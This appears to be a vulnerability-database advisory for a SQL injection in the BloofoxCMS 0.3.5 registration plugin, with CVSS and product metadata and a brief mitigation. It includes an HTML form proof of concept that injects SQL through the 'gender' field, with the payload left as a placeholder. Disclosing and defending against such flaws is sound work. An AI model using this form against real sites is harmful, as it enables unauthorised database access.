vendor:
BloofoxCMS
by:
High-Tech Bridge SA - Ethical Hacking & Penetration Testing
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BloofoxCMS
Affected Version From: 0.3.5
Affected Version To: 0.3.5
Patch Exists: NO
Related CWE: N/A
CPE: a:bloofox.com:bloofoxcms:0.3.5
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
SQL Injection in BloofoxCMS Registration Plugin
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in gender variable. The following PoC is available: <form action="http://host/index.php?page=8" method="post"><input type="hidden" name="un" value="testuser"><input type="hidden" name="pwd" value="123456"><input type="hidden" name="pwd2" value="123456"><input type="hidden" name="em" value="email@email.com"><input type="hidden" name="gender" value="'SQL_CODE_HERE"><input name="send" value="Register & Create Account" type="submit"></form>
Mitigation:
Input validation should be performed to ensure that untrusted data is not used to generate SQL queries that can be exploited.